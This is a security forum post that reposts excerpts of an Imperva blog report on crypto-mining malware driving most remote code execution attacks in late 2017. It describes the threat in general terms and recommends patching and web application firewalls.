New Research: Crypto-mining Drives Almost 90% of All Remote Code Execution Attacks

Prorootect

Level 69
Thread author
Verified
Nov 5, 2011
5,855
New Research: Crypto-mining Drives Almost 90% of All Remote Code Execution Attacks
New Research: Crypto-mining Drives Almost 90% of All Remote Code Execution Attacks – Blog | Imperva

It’s early in 2018 and we have already witnessed one of the top contenders in this year’s web application attacks. Continuing the trend from the last months of 2017, crypto-mining malware is quickly becoming attackers’ favorite modus operandi. In December 2017, 88 percent of all remote code execution (RCE) attacks sent a request to an external source to try to download a crypto-mining malware.

These attacks try to exploit vulnerabilities in the web application source code, mainly remote code execution vulnerabilities, in order to download and run different crypto-mining malware on the infected server. The malware usually uses all CPU computing power, preventing the CPU from doing other tasks and effectively denies service to the application’s users.

RCE vulnerabilities are one of the most dangerous of its kind as attackers may execute malicious code in the vulnerable server. Have you ever wondered what kind of malicious code attackers want to execute? The answer in most cases is – any code that earns the attackers a lot of money with little effort and as quickly as possible.
...
Conclusion
There’s a surge of attackers trying to infect vulnerable servers with crypto-mining malware, and for obvious reasons. Last December almost 90 percent of all the RCE attacks that sent a request to an external source included a crypto-mining malware.

Attackers can make a lot of money (off your server resources) with crypto mining and there are many different crypto currencies to mine. The anonymity of transactions and the easy use of regular CPU make this attack very popular among hackers who want to earn money, and fast.

A crypto-mining malware causes denial of service to the infected server. With most of the server computation power directed to crypto mining, the server is rendered unavailable. Also, getting rid of the malware is not so easy due to its persistence as it adds a scheduled task to download and run it again after a certain period of time.

To protect web applications from crypto-mining malware, the initial attack must be blocked. In this case it’s the RCE vulnerabilities attackers exploit to launch their malware. Organizations using affected servers are advised to use the latest vendor patch to mitigate these kind of vulnerabilities.

An alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.

A WAF that provides virtual patching doesn’t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.

During a recent research project, we saw an extremely large spike of RCE attacks. In this post we will analyze these attacks, drill down into a malicious crypto-mining script, try to “follow the money”, and check if these attacks really are that profitable for attackers.
... read MORE at the website...
virus-malware-345x345.jpg

virus-malware-566x349.jpg
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top